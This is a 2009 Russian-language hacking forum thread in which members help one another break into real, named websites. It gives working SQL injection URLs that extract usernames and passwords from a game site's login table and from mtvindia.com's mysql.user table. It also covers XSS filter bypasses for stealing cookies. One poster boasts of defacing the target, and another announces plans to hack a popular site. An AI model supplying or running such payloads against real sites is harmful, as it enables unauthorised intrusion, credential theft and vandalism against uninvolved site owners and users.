Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11

    Code:
    http://milw0rm.com/papers/149
    прочти, может ето то, что ты искал;-) Ах да, погугли по милворму типа, add new user, insert, update, посмотри примеры в сплоитах.
     
    #8061 The_HuliGun, 17 Jul 2009
    Last edited: 17 Jul 2009
  2. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    чтото не то =\\

    провожу sql иньекцию ..када синтаксис не верен выводит ошибку синтаксиса .. а когда отправляю правильный запрос(с теми изменениями что мне нужны конечно) скрипт плюётся и выводит Invalid query: No database selected

    в чём может быть трабл ? когда код без изменений( тоесть без иньекции) то всё норм работает =\\

    пс и коментрии страно срабатывают ..

    /* - работает только если его потом закрыть

    -- работает странно както если сделать

    union select 1,2,3,4((1='1 AND (ishidden=0))

    он напишет

    Code:
    Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '((1='1') AND (ishidden=0))' at line 1
    а если union select 1,2,3,4--((1='1 AND (ishidden=0))

    напишет

    Code:
    Invalid query: Unknown column 'ishidden' in 'field list'
    тоесть срабатывает как робел Оо

    а # вще не срабатывает =\\
     
    #8062 Doom123, 17 Jul 2009
    Last edited: 17 Jul 2009
  3. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    Ап
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Doom123
    1. это происходит когда в коде нет выбора БД перед запросом т.е. нет например такого
    Code:
    mysql_select_db('mysql'); 
    , а сам sql запрос выглядит например так:
    Code:
    $sql = "SELECT Host,User,Password FROM mysql.`User` where max_questions=".$id;
    т.е. при выборке в FROM указывается не только таблица, но и БД. Когда после этого ты ставишь union select ... from blabla ты не указываешь БД, и поэтому запрос возвращает ошибку что бд не выбрана.
    2. 5 ветка требует закрытых /* коментов (как mssql) а перед и после -- должны стоять пробелы, и # в ГЕТ запросе нужно заменять на %23
     
    3 people like this.
  5. blase-

    blase- New Member

    Joined:
    11 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    где можно найти пароль? я узнал только логин отсюда:
    http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+23,1--
    а пароль найти не могу, всего таблиц 27-28... помогите найти
    п.с. я новичек, поэтому нетрогайте сайт дайте мне потренироваться...гыг
     
  6. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11

    Так проще, узнал допустим таблицу:
    Code:
    _http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name,table_schema),7,8,9,10,11+from+information_schema.tables+limit+23,1--
    Узнал колонки:
    Code:
    _http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,column_name),7,8,9,10,11+from+information_schema.columns+where+table_name=0x6C6F67696E+limit+0,1--
    Достал информацию, которая тебе нужна:
    Code:
    _http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,psw),7,8,9,10,11+from+tgp_gamedb.login+limit+0,1--
    А так, читай статьи, юзай SIPT.
     
    #8066 The_HuliGun, 17 Jul 2009
    Last edited: 17 Jul 2009
  7. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    "><script>alert(document.cookie)</script> получается выполнить.
    при подстановке ссылки на сниффер ничего не получается (проверено несколькими людьми), видимо что-то фильтруется.
    короч ищи другую xss)
     
  8. JOHNik

    JOHNik Member

    Joined:
    21 Apr 2009
    Messages:
    51
    Likes Received:
    14
    Reputations:
    0
    Problema so znakom "="
     
    1 person likes this.
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Поправлю:
    >= MySQL 5.0.51

    До этого можно незакрытые
     
  10. blase-

    blase- New Member

    Joined:
    11 Jul 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    The_HuliGun, большое спасибо, на другом форуме мне посоветовали использовать group, но этот более проще, спасибо!
    п.с. незаходите теперь на тот сайт, там теперь ну просто кошмар!!! веб-вандализм)))
     
  11. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Возможно ли провести xss если фильруется <> скобки фигурные. а остальное нет.
     
    #8071 nub-hacker, 17 Jul 2009
    Last edited: 17 Jul 2009
  12. br3k

    br3k Elder - Старейшина

    Joined:
    19 Sep 2007
    Messages:
    130
    Likes Received:
    107
    Reputations:
    17
    Используй String.fromCharCode()
     
  13. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    так как я использую эту функцию если я пихаю в поле <script>alert()</script> и в исходниках без <>
    вот так scriptalert()/script
     
  14. br3k

    br3k Elder - Старейшина

    Joined:
    19 Sep 2007
    Messages:
    130
    Likes Received:
    107
    Reputations:
    17
    Тогда используй другую кодировку - UTF-7
    символы “<”, “>” заменяются на “+ADw-”, ”+AD4-”
     
  15. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    нубхакер

    http://ha.ckers.org/xss.html там снизу есть Character Encoding Calculator
    В поле ASCII Text: вставляешь <script>alert('')</script>
    Жмешь encode
    Дальше содержимое

    Decimal Value:
    HTML (without semicolons):

    Копируешь и подставляешь там где уязвимый параметр
     
  16. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    это сакс, работает токо в ослике. не факт, что у админа осёл. ЗЫ вопрос. в версии phpbb 2.0.xx в куках лежит хэш пасс?


    add// нашол нормальную пасивку, всё теперь буду хекать популярный сайт.
     
  17. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    народ пытался раскрутить не получается взять )
    http://www.***.com/news/news.php?id=2983+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.***.com/news/news.php?id=2983+union+select+1,table_name,3,4,5,6,7,8,9+from+information.schema.tables/*
    забираю tables:user
    подбираю колонки переведя таблицу в sqlhex - password, user
    Пытаюсь добыть инфу
    http://www.***/news/news.php?id=2983+union+select+1,concat_ws(0x3a,password,user),3,4,5,6,7,8,9+from+user/*
    И выходит пустое место где во всех пред случаях работала sql-inj =((( тоесть страница выходит как надо, но место sql пустое (
    Вот
    http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws%280x3a,password,user%29,3,4,5,6,7,8,9+from+user--
     
    #8077 2la.painkiller, 17 Jul 2009
    Last edited: 17 Jul 2009
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2la.painkiller +limit+x,1/* x=0....10000
     
  19. 2la.painkiller

    2la.painkiller New Member

    Joined:
    22 May 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    -10
    ну так без limit должно выводить первое значение.
    Мне больше интересен факт почему так?

    пс. с лимит тоже не выводит
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2la.painkiller

    Базу указывать надо. Таблица в другой базе. И статьи читать ПЕРЕД тем как вопросы задавать.

    http://www.mtvindia.com/news/news.php?id=-2983+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9+from+mysql.user/*
     
Thread Status:
Not open for further replies.